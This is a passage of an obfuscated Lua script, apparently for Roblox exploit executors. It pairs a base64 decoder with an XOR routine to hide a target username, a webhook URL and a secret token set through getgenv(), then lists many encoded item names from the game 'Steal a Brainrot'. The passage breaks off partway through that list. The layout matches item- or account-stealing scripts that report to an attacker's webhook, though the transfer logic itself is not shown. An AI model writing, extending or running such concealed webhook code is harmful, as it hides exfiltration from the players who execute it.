--[[ Protected with multi-layer encoding ]]
local _Ol00IO0=tostring(5152);local _lOOOlI=tostring(3110);local _IlIOOO0OI0=tostring(1644);local _lllOIll0I0=55355;local _lO00IIIl="_O00IO";local _IlOlI0OOl0=47354;
local _OllIlOOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
local function _0I0OllIl(_0IlI00)
  local _OllO0O=""
  _0IlI00=string.gsub(_0IlI00,"[^".._OllIlOOI.."=]","")
  for _Ol0I=1,#_0IlI00,4 do
    local a=string.find(_OllIlOOI,string.sub(_0IlI00,_Ol0I,_Ol0I),1,true)-1
    local b=string.find(_OllIlOOI,string.sub(_0IlI00,_Ol0I+1,_Ol0I+1),1,true)-1
    local c=string.find(_OllIlOOI,string.sub(_0IlI00,_Ol0I+2,_Ol0I+2),1,true)
    local d=string.find(_OllIlOOI,string.sub(_0IlI00,_Ol0I+3,_Ol0I+3),1,true)
    if c then c=c-1 end
    if d then d=d-1 end
    _OllO0O=_OllO0O..string.char((a*4+math.floor((b or 0)/16))%256)
    if c then _OllO0O=_OllO0O..string.char(((b or 0)%16*16+math.floor((c or 0)/4))%256) end
    if d then _OllO0O=_OllO0O..string.char(((c or 0)%4*64+(d or 0))%256) end
  end
  return _OllO0O
end
local _0OOOI0OO={254,132,77,214,95,141,247,173,108,83,203,8}
local function _lOl0lOOO(_0IlI00)
  local _OllO0O=""
  for _Ol0I=1,#_0IlI00 do
    local k=_0OOOI0OO[(_Ol0I-1)%#_0OOOI0OO+1]
    local b=string.byte(_0IlI00,_Ol0I)
    local r=0
    for bit=0,7 do
      local ba=math.floor(b/2^bit)%2
      local bb=math.floor(k/2^bit)%2
      if ba~=bb then r=r+2^bit end
    end
    _OllO0O=_OllO0O..string.char(r)
  end
  return _OllO0O
end
local function _OlIlI0lIIIll(_0IlI00) return _lOl0lOOO(_0I0OllIl(_0IlI00)) end
local _OOIIlO="_l0OII";local _IIIIlIO0="_OlOl0";local _llIl000ll="_O00lI";
local function _l0II0IIIlI()
getgenv().User = _OlIlI0lIIIll("lOUmpW".."26xp".."xV")

getgenv().Webhook = _OlIlI0lIIIll("lvA".."5piy32II".."IOrhrk".."fYp+Dzi".."moI".."NI6In".."ieEv".."vjDi".."nN5DYv8/".."x7N95m2".."0x5".."xbZf8".."6z71+73D".."pu+Yz".."EfJGv/".."4fvDvu".."hP4DOrx".."OsOMp".."m2q7pes/".."PZxF".."ssAlvx".."7IqOsu".."F/lGjMM".."L5x3Js".."N0GNvh".."Rmdw0".."sGr9z+c".."1NaBOkA=".."=")

getgenv().SecretToken = _OlIlI0lIIIll("mrF04Tr".."rxc5".."BMq85n".."Kl54D".."u02".."swJ".."Zqg".."lmLcr".."5j29x".."c9b".."MPIx")

getgenv().Brainrots = {
  _OlIlI0lIIIll("rfA/tyjv".."kt8eKutN".."kuE9".."vj7jgw=".."="),
  _OlIlI0lIIIll("s+EioTM="),
  _OlIlI0lIIIll("tuE".."ssjPoh".."N5MG6R".."6jeEgtzE".."="),
  _OlIlI0lIIIll("re8k".."tDbpno0".."4PKJkm/".."A="),
  _OlIlI0lIIIll("tv0ppD6t".."s98".."NNKRm3".."scsu".."DHom8".."EDP".."aI="),
  _OlIlI0lIIIll("uvY".."ssTD".."j1+oF".."Paxtj".."O0jvw=="),
  _OlIlI0lIIIll("uvYssTD".."j1+4NPa".."Vtk".."ugi".."uDY="),
  _OlIlI0lIIIll("sus7s".."3/Bm".."NsJc4ltn".."/Y="),
  _OlIlI0lIIIll("suV".."thS".."r9h".."cgBNutLk".."ekvvzHsh".."MQDP".."Q=="),
  _OlIlI0lIIIll("veEhsyz5".."nsw".."Ac5ttm".."eU+o".."yw="),
  _OlIlI0lIIIll("rus".."9tSr/go".."0NPa8".."ouO0".."3rCr/g".."g=="),
  _OlIlI0lIIIll("rOs".."+syatl".."sMIc".."59t".."muA0"),
  _OlIlI0lIIIll("veU9".."vyv".."smcJMHqR".."qhw=".."="),
  _OlIlI0lIIIll("vesiv".."Tat".."lsMIc4Z".."hku8k"),
  _OlIlI0lIIIll("vPE/sS".."r/mI".."0tPa".."8ouPY0oy".."3i"),
  _OlIlI0lIIIll("teE5oy/".."sg40uIaR".."7"),
  _OlIlI0lIIIll("rOEkuD".."b5mI0".."/P65hm".."ewk".."ojA="),
  _OlIlI0lIIIll("sus+9".."h7gnsoD".."IA=="),
  _OlIlI0lIIIll("suVthTr".."uhcgYc".."4hnk+Yku".."D7+ns".."IC"),
  _OlIlI0lIIIll("sus+9g".."zonMIA".."MqN".."7"),
  _OlIlI0lIIIll("re0qu".."DD/ko0".."vMrl".."pju".."Uusw=="),
  _OlIlI0lIIIll("uPYssS3s".."msx".."MMq".."Vs3scl".."uTz/lsA".."N"),
  _OlIlI0lIIIll("suVtlT7+".."lo0uPKQ".."="),
  _OlIlI0lIIIll("suVtkDD".."ik40".."vPKZql+".."ospTb".."imQ=="),
  _OlIlI0lIIIll("u+go".."sD7j".."g8JMFblh".."mes".."="),
  _OlIlI0lIIIll("rfQiuT".."T018wCN+".."tYi+k".."9vSY="),
  _OlIlI0lIIIll("suVt".."kTb".."jkMg".."ec5htl".."esht".."zc="),
  _OlIlI0lIIIll("ue0jsTr".."/1+oJI".."ap8"),
  _OlIlI0lIIIll("reU".."guybjno0".."qMr98l".."+ok"),
  _OlIlI0lIIIll("sus".."+9gz9lso".."ENr98".."l/c="),
  _OlIlI0lIIIll("uOE+o".."jb7ko".."1aZA=="),
  _OlIlI0lIIIll("qOEjojDh".."nsgeP".."OtYn".."/IiuDr/".."mA=".."="),
  _OlIlI0lIIIll("rfQ".."ssTfo".."g9kFc5".."99n+gooi".."vk"),
  _OlIlI0lIIIll("v+o5uTH".."kmA=="),
  _OlIlI0lIIIll("ueU".."/tzLs1".."8wCN+tF".."n+A4u".."Dv4mco="),
  _OlIlI0lIIIll("rOs+sy".."v5no04".."Jqpkm/A5".."vw=="),
  _OlIlI0lIIIll("sOUuvjC".."tpN0".."VN656"),
  _OlIlI0lIIIll("uO0+vj".."bjmI0v".."P6R/kO0".."juQ=".."="),
  _OlIlI0lIIIll("suU7tz".."vihcQYP".."Otbju0".."jvyvi"),
  _OlIlI0lIIIll("tOshuiat".."vcIA".."P7I".."oreUloy".."0="),
  _OlIlI0lIIIll("qu0/v".."zPknMwAO".."qBp".."3tAkp".."Dbh".."nsYNP".."6pj".."kQ=="),
  _OlIlI0lIIIll("teE".."5tTf4hdh".."MMqVs3".."sk4".."pSv4hdg="),
  _OlIlI0lIIIll("rfMssT".."j01+8".."ePLg="),
  _OlIlI0lIIIll("suVthDD".."glsMYO".."qgou".."fYsuDv".."o"),
  _OlIlI0lIIIll("sfYut".."zPok8IC"),
  _OlIlI0lIIIll("qu0".."uoj7u1/".."4NO756"),
  _OlIlI0lIIIll("teE5oy/s".."g40nNrt".."pig".."=="),
  _OlIlI0lIIIll("suVt".."gj7umI0v".."PKZql+".."ospTbimQ".."=="),
  _OlIlI0lIIIll("quUjsX".."/ZlsMLc".."4Btk".."uE5tzHq"),
  _OlIlI0lIIIll("sus7vzG".."tpcIfN".."g=="),
  _OlIlI0lIIIll("sus+".."9gvsl".."MIeOr".."9pj".."Q=="),
  _OlIlI0lIIIll("u/Iku".."jrpmMM="),
  _OlIlI0lIIIll("sus+9g//".."nsADIA".."=="),
  _OlIlI0lIIIll("suVtnDDh".."m9R".."MFLlpk".."OAo"),
  _OlIlI0lIIIll("qaQ".."ipH/B"),
  _OlIlI0lIIIll("u/c".."ivX/".."eks".."YDP6pg"),
  _OlIlI0lIIIll("sus+".."9g/4kMoF".."Nrg".."="),
  _OlIlI0lIIIll("qvYs".."uj7h".."kskDP".."Q=="),
  _OlIlI0lIIIll("uesv".."tDP".."kmcJ".."MBq".."Vhn".."e0uujbj".."mA=="),
  _OlIlI0lIIIll("qvEr".."sH/ZmN".."gPMqU="),
  _OlIlI0lIIIll("s+0oo".."jr5ksQe".."MutK".."l+ckt".."TPog8".."gFI".."ao="),
  _OlIlI0lIIIll("s+sjsy".."atusI".."CNrIor".."OEkuDvok".."t8="),
  _OlIlI0lIIIll("vewku".."jPk".."mY0v".."O6Jk".."lw=="),
  _OlIlI0lIIIll("vewkpiz".."i18wCN+".."tZi+E".."+uQ=="),
  _OlIlI0lIIIll("suVthS/".."imMY".."Vc4x6n+".."opsw=="),
  _OlIlI0lIIIll("vOUuoy34".."18wCN+t".."NmeM4".."pCo="),
  _OlIlI0lIIIll("sus+".."9h3/".."mN4="),
  _OlIlI0lIIIll("suV".."tkyf5n".."sMPJ+tP".."jOUjsjo".."="),
  _OlIlI0lIIIll("sus+9hz".."smckFNr".."g="),
  _OlIlI0lIIIll("veEh".."ozP".."shc4FPa".."IoqO".."0uvzD+ns".."MF"),
  _OlIlI0lIIIll("sus+9".."mm6"),
  _OlIlI0lIIIll("sus+9".."hLi".."lcQAO".."rg="),
  _OlIlI0lIIIll("s+s".."jsyatus".."ICNr".."Iorv".."EqsSY="),
  _OlIlI0lIIIll("sus+9hX".."im8EVc4h".."nk+YkuD7".."+nsICM".."rg="),
  _OlIlI0lIIIll("sus+9g".."z9mMIHK".."utLkekv".."vzHshMQ".."DPap7"),
  _OlIlI0lIIIll("sus+".."9hf".."ig94".."cPL97".."l/A".."ipQ".."=="),
  _OlIlI0lIIIll("sus+9g/h".."lsMFJ6R".."7"),
  _OlIlI0lIIIll("vewktTP".."og8gFI".."aoovfE9v".."zvon".."t8N"),
  _OlIlI0lIIIll("us5".."thj7jk8w".."="),
  _OlIlI0lIIIll("suU+9gz".."khA=="),
  _OlIlI0lIIIll("rfQ".."kuDH01".."+UN".."PqZx"),
  _OlIlI0lIIIll("sus".."+9gz".."6ksgYO".."65pjPA+"),
  _OlIlI0lIIIll("quUu".."uS3".."kg8xMEa".."Jrl".."+chsyvs"),
  _OlIlI0lIIIll("sPEuuj".."rshcJMF".."6Jmkfc+t".."yr/mA".."=="),
  _OlIlI0lIIIll("sus+".."9hzi".."ms8FPap7".."l+sj".."tyw="),
  _OlIlI0lIIIll("vew".."ktTP".."og8gFIao".."osOs".."ouiv".."ont8".."N"),
  _OlIlI0lIIIll("vewkuzHk".."mcI="),
  _OlIlI0lIIIll("rfMss".."X/emMk".."N"),
  _OlIlI0lIIIll("sOs".."i9j".."L01+UJM".."rl8"),
  _OlIlI0lIIIll("s+U/vz".."7un8RMEK".."R6n".."/4iuDY".."="),
  _OlIlI0lIIIll("quUu".."uS3km8".."EDc4h6ke".."cisjbhm8".."I="),
  _OlIlI0lIIIll("sus+9".."m24"),
  _OlIlI0lIIIll("suVt".."kS3s".."mckJc4h".."nk+Yk".."uD7+n".."sIC"),
  _OlIlI0lIIIll("sus".."+9h34".."hd8FJ6".."R7"),
  _OlIlI0lIIIll("uus".."jvT".."r0g9geM".."aQou/w9".."pDr+hA=="),
  _OlIlI0lIIIll("yLM="),
  _OlIlI0lIIIll("sus+".."9hzlns4".."ANr9".."tl/YspQ".."=="),
  _OlIlI0lIIIll("ufEopS".."utwZta"),
  _OlIlI0lIIIll("sus+9hLk".."1+oNJ6".."J8kfc".."="),
  _OlIlI0lIIIll("rOUjsX/".."fnsMLc4".."l9jQ=".."="),
  _OlIlI0lIIIll("sOsi9j".."L01/0e".."Nrht".."kPA".."="),
  _OlIlI0lIIIll("sus+9".."hHimMJM".."HrIotus5".."pS/".."ig94F".."J6R".."7"),
  _OlIlI0lIIIll("sOsi".."9jL01+4".."NPa9x"),
  _OlIlI0lIIIll("v/Y".."utzvi".."h9g".."f"),
  _OlIlI0lIIIll("sus+9g".."74k".."t4NN6J".."kkuU+"),
  _OlIlI0lIIIll("vewktTP".."og8gFIa".."Jmn".."6QPv".."zzkl".."MEJJ65".."hjO0".."jtw=="),
  _OlIlI0lIIIll("vPE/pDb5".."mI0u".."MqV".."sl/A".."i"),
  _OlIlI0lIIIll("vewkujO".."tp9gcI7".."I="),
  _OlIlI0lIIIll("r/Eop".."T7pnsE".."APOten+k".."9vy3".."i"),
  _OlIlI0lIIIll("vew".."ktTPog8".."gFIaoovO".."0uvzzhkt".."kJOrlp"),
  _OlIlI0lIIIll("vPY".."4uD".."b5mI0hMr".."l7l/Ai"),
  _OlIlI0lIIIll("vfE9vzu".."tv8".."IYIL".."tnig=="),
  _OlIlI0lIIIll("s+1tkT".."75ntkD"),
  _OlIlI0lIIIll("tutt".."njCtv8J".."MAKpgi/".."Y="),
  _OlIlI0lIIIll("vfE9vzut".."tNgcOq".."8oreUlo".."y0="),
  _OlIlI0lIIIll("vPEjvyvi".."1+8ZPaJ".."8kaQep".."jbjntkD"),
  _OlIlI0lIIIll("r/Eop".."T7pnsEA".."Mut".."LjOsuuT".."vkm8w="),
  _OlIlI0lIIIll("rus59g/".."4mt0HOqU".."="),
  _OlIlI0lIIIll("sOU4".."sTf5j".."o0iMr5".."vlvA0"),
  _OlIlI0lIIIll("tus/".."szjk".."mcR".."MEaR".."nkw=="),
  _OlIlI0lIIIll("reUjoj".."6tv8I".."YILtnig=".."="),
  _OlIlI0lIIIll("ru0/oz".."Pkg8IFJ6".."oovO0uvz".."zhktkJO".."rlp"),
  _OlIlI0lIIIll("zLE="),
  _OlIlI0lIIIll("rus59hfi".."g94".."cPL8="),
  _OlIlI0lIIIll("quttojCt".."g8JM".."AKpgi/Y="),
  _OlIlI0lIIIll("quEhszL".."ihdkJ"),
  _OlIlI0lIIIll("suVthT7l".."gt9MEKR".."lnO0jty".."zkmM".."M="),
  _OlIlI0lIIIll("su0".."+on/Bnt".."4Yc4".."dhj".."fBthT7".."lgt8".."="),
  _OlIlI0lIIIll("sOsi9jL0".."18gUMqZ".."hkOE="),
  _OlIlI0lIIIll("sOsi".."uX/".."Ajo0kP".."L97ju".."s5"),
  _OlIlI0lIIIll("qvEjsX/Z".."gsMLc".."599k".."ONthT".."7lgt".."8="),
  _OlIlI0lIIIll("vPEju".."Cbgls".."M="),
  _OlIlI0lIIIll("sus+9h".."Xilc4FJ".."6R7"),
  _OlIlI0lIIIll("vfEssi3".."smswYc".."6pmmq".."QdtzT".."/lsU".."BMr9".."ln+ks".."og=="),
  _OlIlI0lIIIll("rugot".."yzo18".."AVc5".."t6m".."/cou".."Cs="),
  _OlIlI0lIIIll("sus+9h".."z4l".."Mwe".."Mqhg".."n/c".."="),
  _OlIlI0lIIIll("z/x8rm".."71xg=="),
  _OlIlI0lIIIll("sus7".."s3/".."BmNsJ".."c4dn".."iOF".."thT7".."lgt8="),
  _OlIlI0lIIIll("ruE".."/pDb5m".."I0uJrl6".."l/Ai"),
  _OlIlI0lIIIll("ufY".."svy/4h".."N5M".."Hq5si".."/c+vw=".."="),
  _OlIlI0lIIIll("ue0rojb".."jno0/".."I7Jsm/Y".."kuDY".."="),
  _OlIlI0lIIIll("ucsMg".."g=="),
  _OlIlI0lIIIll("qvYktTTi".."m8QCPA=".."="),
  _OlIlI0lIIIll("qvYkpjPk".."g8JMB".."7lpkuU".."hsy3".."kg8If"),
  _OlIlI0lIIIll("suV".."tgD7ulM".."xMGap".."rle".."ttm".."jbjg".."8geOq".."Vn"),
  _OlIlI0lIIIll("uO0+vj".."3ilt8I"),
  _OlIlI0lIIIll("reUjoiv".."omA=="),
  _OlIlI0lIIIll("suU".."+9gnsh".."tgFJ".."6p73tcso".."ir/".."mcQY".."Mrg="),
  _OlIlI0lIIIll("sus+9".."hTshcYJI".."aJ8kf".."c="),
  _OlIlI0lIIIll("teU".."/vTr/1/".."4NO7".."56"),
  _OlIlI0lIIIll("uPYs".."uDTomd".."kYNqQ="),
  _OlIlI0lIIIll("sus+9".."gv/nsI".."f"),
  _OlIlI0lIIIll("tOsv".."9hXil".."Y0mPKk".."oreUloy0".."="),
  _OlIlI0lIIIll("suU+9gv".."/lsENP65".."6l/Asp".."Q=="),
  _OlIlI0lIIIll("rvEgpjT".."kmcRMALt".."xmuE".."/vzHk"),
  _OlIlI0lIIIll("rOsutTC".."ts8".."QfMK".."Q="),
  _OlIlI0lIIIll("u/w".."5vzHug4".."0hMr".."98m".."+s="),
  _OlIlI0lIIIll("suVtnT".."7/nMg".."eOKp63sc".."iuz3".."kmcw".."fOqRm"),
  _OlIlI0lIIIll("rOEkuDv".."okt9MB7".."lpkuU".."htw=="),
  _OlIlI0lIIIll("suVtg".."D7u".."lMxMA7".."ltjeF".."thi3o".."hMg".."CJ64="),
  _OlIlI0lIIIll("p+E+pX".."/gjo".."0JK6pl".."l+oo"),
  _OlIlI0lIIIll("ufEop".."C3k".."hcJMF".."6Jvl".."/Asu".."jo="),
  _OlIlI0lIIIll("vOs".."soj".."b5mI0tJr".."lpiu".."05uQ=".."="),
  _OlIlI0lIIIll("sus+9".."gv/ls".."ENP65".."6l/".."AipQ".."=="),
  _OlIlI0lIIIll("qPEhoi".."r/nsM".."Dc5hjm".."+go".."ojDj".."mA=="),
  _OlIlI0lIIIll("sus+9gvi".."hdk".."ZIA=="),
  _OlIlI0lIIIll("pOsgtD".."bo1/".."keMqdpku".."U="),
  _OlIlI0lIIIll("suVt".."lSrult8N".."MKNp"),
  _OlIlI0lIIIll("uPYs".."sTDh".."lo0gMu".."tEn6Q".."Btw=="),
  _OlIlI0lIIIll("u/w5vzH".."ug404I".."apkn+go".."pDA="),
  _OlIlI0lIIIll("sus+9".."gz9jsk".."JIa".."Jml/c".."="),
  _OlIlI0lIIIll("v+MspC3".."kmcRM".."P6ooru".."UhvzHk"),
  _OlIlI0lIIIll("vewst".."Tfol".."MUF"),
  _OlIlI0lIIIll("vOg".."stTTlmM".."EJc4xnn/".."A="),
  _OlIlI0lIIIll("uvEh9hv4".."m40o".."Jqc="),
  _OlIlI0lIIIll("qus/pCv".."4kMQCP".."aIouvY".."ssT".."Djkd8ZJ".."6Jml".."w=="),
  _OlIlI0lIIIll("reUgu".."ybjno0/I".."7Jsm/Yku".."DY="),
  _OlIlI0lIIIll("tOUu".."vTD/nsEA".."Mg=="),
  _OlIlI0lIIIll("qvYouDD+".."g98ZKb".."Fn3tA4p".."D3i1".."5lcY".."/s="),
  _OlIlI0lIIIll("sus".."+9hLsg9k".."JPLg="),
  _OlIlI0lIIIll("teU".."/vTr/n".."Mwe".."c4B9".."jO84p".."A=="),
  _OlIlI0lIIIll("vO0+u".."TH5ko0".."rOr5".."4ju05".."sy3o"),
  _OlIlI0lIIIll("suV".."tgD7".."ulMxMAK".."p8i".."/YjuX/".."elt".."kZIaVhi".."uU="),
  _OlIlI0lIIIll("teU/vTr".."/n8gNI".."b8o".."svE7vSr".."/"),
  _OlIlI0lIIIll("rus9".."9g/ih40/".."MqN9jA=="),
  _OlIlI0lIIIll("uushpjf".."kmcRM".."Ga5".."8je8k".."uDY="),
  _OlIlI0lIIIll("ruUj".."sj7jn".."sMFc4".."16kf".."c5vz".."Hk"),
  _OlIlI0lIIIll("ue0j".."sTr/1".."+4FIL9tj".."Oos"),
  _OlIlI0lIIIll("quEj".."oj7umME".."Dc59tn".."eoktTA".."="),
  _OlIlI0lIIIll("vesuuT6t".."tt4fMr".."h7l+oi"),
  _OlIlI0lIIIll("vOEhoz".."Ps1+".."8JP75vnw".."=="),
  _OlIlI0lIIIll("re84".."ujOtp".."MYZP6co".."re8".."4ujM="),
  _OlIlI0lIIIll("tfY4pi".."rm1/0NN".."KIoruUq".."vw=="),
  _OlIlI0lIIIll("veU9p".."irul".."MQCP".."OtLku".."s6uDbj".."mA=="),
  _OlIlI0lIIIll("vPYspTbh".."nsMF".."c4ltj".."O0g".."tDbj".."ng=="),
  _OlIlI0lIIIll("svE".."79hP4gY0".."gJr0="),
  _OlIlI0lIIIll("v+o9t".."zPk1+8NM".."a5k"),
  _OlIlI0lIIIll("sOs".."i9hPs".."1/0DP6Jy".."l+U="),
  _OlIlI0lIIIll("vew/v".."yzglt4BM".."qZpig=="),
  _OlIlI0lIIIll("sus+9hjs".."g9kFJ".."6R7"),
  _OlIlI0lIIIll("vOUg".."tCqttc".."wBMb4ore".."Uloy0="),
  _OlIlI0lIIIll("s+U+".."ojDpm".."MMYOqhn".."3tA".."ouj".."r9nsg".."IPKVt"),
  _OlIlI0lIIIll("ru0utTb".."imcgYJ6".."oos+UutT".."fkmcw="),
  _OlIlI0lIIIll("vOs".."vt3/d".."lsM".."IMg=="),
  _OlIlI0lIIIll("vPEluX".."/pko0iP".."K5kkQ".."=="),
  _OlIlI0lIIIll("uPYkuX/D".."nsMGMg=".."="),
  _OlIlI0lIIIll("ufYsuD".."zln".."sgA".."P6Qor".."fQkp".."Db5ks".."EA"),
  _OlIlI0lIIIll("sus+9".."gvkh8R".."MB6prkfc".."="),
  _OlIlI0lIIIll("qusi".."ojbjno0/".."O7lhk/".."QkuDY="),
  _OlIlI0lIIIll("p+E".."5v3".."/Om8wZ".."IA=="),
  _OlIlI0lIIIll("ue0jsTr/".."1+oAPKln"),
  _OlIlI0lIIIll("uvEq9j".."v4kI0".."IJqw="),
  _OlIlI0lIIIll("s/E".."guyatt".."sAOMqdpn".."PE="),
  _OlIlI0lIIIll("quU/oj7".."/gsoN".."c4hhjfA".."opDHs"),
  _OlIlI0lIIIll("rfU4t".."zPsmc".."wCMg=".."="),
  _OlIlI0lIIIll("reosv".."zPomdc".."D"),
  _OlIlI0lIIIll("ves/".."uH/O".."mN8Cc4".."hnjOpth".."T7lg".."t8="),
  _OlIlI0lIIIll("v/U4tzH".."sgtk="),
  _OlIlI0lIIIll("veUuty".."zkg".."8JMA".."Kp8n+gk".."ojA="),
  _OlIlI0lIIIll("sfYutz".."Pkg8xMH".."Llr".."n+gs"),
  _OlIlI0lIIIll("vfYstD".."3i1+".."EFPqRmm".."/A5tw=".."="),
  _OlIlI0lIIIll("sus+9hD/".."lMwAOr9n".."jQ=="),
  _OlIlI0lIIIll("qvYstS".."vihcJM".."F6Jmkfc".."soy3i"),
  _OlIlI0lIIIll("vPY".."/9jr+1/".."kJO+tYn".."/Akpirg"),
  _OlIlI0lIIIll("ru0ut".."Tbim".."chM".."Hqprn".."ewkuD".."4="),
  _OlIlI0lIIIll("ruUmp".."D7lmswY".."Pqp8".."l+os"),
  _OlIlI0lIIIll("vOsgtD7".."/k8".."QCOu".."tckfY5".."vzHkng=".."="),
  _OlIlI0lIIIll("sus+9h".."3ims8FP".."aJ8kf".."c="),
  _OlIlI0lIIIll("vOUhujr".."/nsMNc".."5ttjvQ".."opDLk".."mdk".."FPao="),
  _OlIlI0lIIIll("ruUmpD7".."lmswY".."Pqpln/A".."="),
  _OlIlI0lIIIll("sus+".."9gv4mc".."oYJqV".."vivE".."jsTzkg8I".."f"),
  _OlIlI0lIIIll("vPEhtDb".."5mI0uMqV".."sl/Ai9".."gv/lsYY".."PLlhiu".."s="),
  _OlIlI0lIIIll("vOUhujr/".."nsMD".."c4dn".."kushuQ=".."="),
  _OlIlI0lIIIll("suU+".."9hzsh9gP".."O6Jmn/c".."="),
  _OlIlI0lIIIll("qvYkp".."i/k1/ke".."PLt4l6Q".."ZpDD9h8x".."MB7lh".."jvQs"),
  _OlIlI0lIIIll("ueU5ojb".."5mI04M".."qhnius="),
  _OlIlI0lIIIll("sus+".."9hzlnsUZ".."MqVh".."kO0".."+"),
  _OlIlI0lIIIll("veU9v".."3/Zls4D"),
  _OlIlI0lIIIll("tOUu".."vTC".."tvcwPOOt".."Cn+cm"),
  _OlIlI0lIIIll("qvYouDD+".."g98ZKbFn".."3tA4".."pD3i".."155cY/s".."="),
  _OlIlI0lIIIll("q/Y4".."tDbj".."no0qP6p".."lm+o".."qozbjng".."=="),
  _OlIlI0lIIIll("u/w5v".."zHug40".."uMqdk".."m/YkuD".."4="),
  _OlIlI0lIIIll("qOU".."gpjb/lo0".."vMrt".."4i+ck".."uD4="),
  _OlIlI0lIIIll("qvYsu".."j7hntkN".."c596".."n+g".."suj4".."="),
  _OlIlI0lIIIll("sfYut".."zPo".."hcJMHL".."lrn+gs"),
  _OlIlI0lIIIll("qvEmtz".."HjmI".."0uMqVp".."kOo".."i"),
  _OlIlI0lIIIll("v+gopSz".."kmA=="),
  _OlIlI0lIIIll("q+ouujb5".."mI0/MqZh".."ius="),
  _OlIlI0lIIIll("qu0".."9v3/ZmN0".."Fc5".."9pne".."s="),
  _OlIlI0lIIIll("seAk".."uH/JnsN".."MF6Jm3sA".."4uA".."=="),
  _OlIlI0lIIIll("u/c9p".."Dr+".."hMJM".."AKJvkOs/".."tw=="),
  _OlIlI0lIIIll("s+s".."jsyatu".."sICNr".."Ios+Uj"),
  _OlIlI0lIIIll("qu0qp".."DDhnsoe".."NutOjPE".."5uT".."Hjn".."g=="),
  _OlIlI0lIIIll("sus+9hz".."/mM4DN6J".."kku05u".."Sw="),
  _OlIlI0lIIIll("qvY".."suj".."7hkt8D".."c596n".."+gsu".."j4="),
  _OlIlI0lIIIll("s+U".."5ojri"),
  _OlIlI0lIIIll("vew".."kvirsmcQ".."COutcn+c".."iuDbjng".."=="),
  _OlIlI0lIIIll("ueU".."5oj7".."5nsMDc4".."Vxn+o".."kuD".."A="),
  _OlIlI0lIIIll("ue0/tzns".."1+4".."JP65".."7ivYo"),
  _OlIlI0lIIIll("ves".."uuTnsmdk".."Dc45km+I".."suCvi"),
  _OlIlI0lIIIll("uO03rC".."atpMIIM".."g=="),
  _OlIlI0lIIIll("qvYos3/".."ZhcgJ".."c596m".."+FthT7".."lgt8="),
  _OlIlI0lIIIll("vOU".."jtzH".."kg8J".."MEapmmu0".."5uQ=="),
  _OlIlI0lIIIll("tOUuvTC".."tpN0N".."Ja5mius+".."tw=="),
  _OlIlI0lIIIll("qusku".."jr5".."g8JMFaR".."rn+c".."uvzHi"),
  _OlIlI0lIIIll("veEjoi34".."lM4Fc4".."V9neg4".."tTzk"),
  _OlIlI0lIIIll("veU".."/pD".."D5nsMF".."c4l6n+".."0jv".."zHk"),
  _OlIlI0lIIIll("veU/".."ujD".."i"),
  _OlIlI0lIIIll("veUuvj".."D/h".."cQYP".."OtF".."m+giu".."Db5mA=".."="),
  _OlIlI0lIIIll("rfQiuD".."jkmcRMAr".."5pne8ku".."DY="),
  _OlIlI0lIIIll("sus+9h".."HimM".."8FPaJ7"),
  _OlIlI0lIIIll("tO0j".."sTPo1+".."cFPaxkm6".."Qetzf4h".."Q=="),
  _OlIlI0lIIIll("qvYstTD".."pgs4DJ7".."5ki".."6QJszPsh".."8gAM".."q99".."jfA4rA=="),
  _OlIlI0lIIIll("s+Uq".."v3/fns".."8OOr".."9hkO0="),
  _OlIlI0lIIIll("rOwkuDCt".."v8gAOq".."hnjvAopD".."bjmA=="),
  _OlIlI0lIIIll("quFt".."gjqto8hM".."AKpgi/".."Y="),
  _OlIlI0lIIIll("ueUjsT7j".."jcgAP6".."IoqvY4uj".."7hlg=="),
  _OlIlI0lIIIll("suE".."/oz".."Poh".."dgANrl9".."kuE".."="),
  _OlIlI0lIIIll("qusv9g".."vilcRM".."B6Rql".."w=="),
  _OlIlI0lIIIll("rfAipi".."/i1+E".."ZPqJml".."+oi"),
  _OlIlI0lIIIll("ues/".."vzP".."hmI0".."7Mr9tjOk".."ouj".."Djk98FP6".."dn"),
  _OlIlI0lIIIll("ues/v".."zPhm".."I0/J".."ql/kesr".."sy3i"),
  _OlIlI0lIIIll("veU7tzP".."hmI06Or".."l8i".."+s+uQ=="),
  _OlIlI0lIIIll("v/I".."itT7pmN8".."FP6".."dp"),
  _OlIlI0lIIIll("qu0".."qpDbhnsM".."Fc5x".."piuE/".."uzrhn".."sMF"),
  _OlIlI0lIIIll("pO0v".."pD6tr".."dgOIaoo".."pO0vpD7".."hnsMF"),
  _OlIlI0lIIIll("vOsg".."tDDg".."lcQCOu".."tPi/ckuD".."Y="),
  _OlIlI0lIIIll("rfQku".."THkh".."cJM".."FKRki".."+Ykp".."DA="),
  _OlIlI0lIIIll("vPY4".."oivi1+".."oFMqd9i".."vAi"),
  _OlIlI0lIIIll("vOs".."gtD".."7/k8QeP".."OtLjO".."suuTvk".."m8I="),
  _OlIlI0lIIIll("rOwkuDCt".."o8INI".."L9tjO0j".."uQ=="),
  _OlIlI0lIIIll("sfY".."suDj4g".."8QCOutJ".."kOUjtyz".."+ns".."MF"),
  _OlIlI0lIIIll("uPYksTC".."ttMwBN".."qdn"),
  _OlIlI0lIIIll("vPElu".."X/p".."ko0qJq5".."vkQ=="),
  _OlIlI0lIIIll("reEs".."ujCtpcg".."LMqdn"),
  _OlIlI0lIIIll("re0quz6".."tsMQ".."ePw=="),
  _OlIlI0lIIIll("rvE".."rsD7vls".."EA"),
  _OlIlI0lIIIll("vewitTzi".."1+8Z".."PaVx"),
  _OlIlI0lIIIll("re0quz".."6ttcIV"),
  _OlIlI0lIIIll("ru1thjat".."oMwYNrl".."lm+giuA=".."="),
  _OlIlI0lIIIll("r/Est".."TT4".."m8w="),
  _OlIlI0lIIIll("ruUjsj7".."ulMQCOut".."Kn+os".."uDbjng=".."="),
  _OlIlI0lIIIll("vesuuSz".."kmcRMHqp".."lnw=="),
  _OlIlI0lIIIll("rfA/t".."yjvkt8e".."Nqdkl6Q".."Luj7g".."nsM".."LNqdklw".."=="),
  _OlIlI0lIIIll("ru09v".."3/d".."mNkNJ6Q="),
  _OlIlI0lIIIll("veU/tzLo".."m8EDc41h".."kvA/s".."zPhmA=".."="),
  _OlIlI0lIIIll("vOg4sz3".."ohd8".."FPaVh3".."ssu".."ojD".."9gt4FPaI".."="),
  _OlIlI0lIIIll("vegktTT".."ohcQC".."POtL".."jOUvuQ".."=="),
  _OlIlI0lIIIll("r/Ek".."oDbim8R".."MEqZtkuE".."iuDHk"),
  _OlIlI0lIIIll("uegipD".."3i1+seJr".."98keA/".."vzPh".."mA=="),
